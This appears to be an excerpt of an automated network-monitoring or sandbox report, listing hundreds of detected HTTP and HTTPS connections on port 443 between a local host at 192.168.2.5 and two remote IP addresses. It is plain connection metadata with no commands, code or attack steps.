Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61261
Source: unknown	Network traffic detected: HTTP traffic on port 61301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61017
Source: unknown	Network traffic detected: HTTP traffic on port 61068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61018
Source: unknown	Network traffic detected: HTTP traffic on port 61043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61254
Source: unknown	Network traffic detected: HTTP traffic on port 61312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61135
Source: unknown	Network traffic detected: HTTP traffic on port 61125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 61297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 61077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61305
Source: unknown	Network traffic detected: HTTP traffic on port 61105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61307
Source: unknown	Network traffic detected: HTTP traffic on port 61208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61309
Source: unknown	Network traffic detected: HTTP traffic on port 61183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61300
Source: unknown	Network traffic detected: HTTP traffic on port 61160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 61116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61317
Source: unknown	Network traffic detected: HTTP traffic on port 61232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61318
Source: unknown	Network traffic detected: HTTP traffic on port 61066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 61314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61313
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61209
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61321
Source: unknown	Network traffic detected: HTTP traffic on port 61149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61324
Source: unknown	Network traffic detected: HTTP traffic on port 61078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61216
Source: unknown	Network traffic detected: HTTP traffic on port 61104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212
Source: unknown	Network traffic detected: HTTP traffic on port 61033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61213
Source: unknown	Network traffic detected: HTTP traffic on port 61276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61214
Source: unknown	Network traffic detected: HTTP traffic on port 61115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown	Network traffic detected: HTTP traffic on port 61196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61085
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown	Network traffic detected: HTTP traffic on port 61161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61096
Source: unknown	Network traffic detected: HTTP traffic on port 61241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown	Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61099
Source: unknown	Network traffic detected: HTTP traffic on port 61184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61272
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown	Network traffic detected: HTTP traffic on port 61240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61143
Source: unknown	Network traffic detected: HTTP traffic on port 61252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61267
Source: unknown	Network traffic detected: HTTP traffic on port 61128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61269
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 61263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61279
Source: unknown	Network traffic detected: HTTP traffic on port 61014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61159
Source: unknown	Network traffic detected: HTTP traffic on port 61278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown	Network traffic detected: HTTP traffic on port 61251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61294
Source: unknown	Network traffic detected: HTTP traffic on port 61197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61285
Source: unknown	Network traffic detected: HTTP traffic on port 61290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown	Network traffic detected: HTTP traffic on port 61036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61286
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61287
Source: unknown	Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61048
Source: unknown	Network traffic detected: HTTP traffic on port 61013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61184
Source: unknown	Network traffic detected: HTTP traffic on port 61322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61175
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61059
Source: unknown	Network traffic detected: HTTP traffic on port 61163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61164 -> 443

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
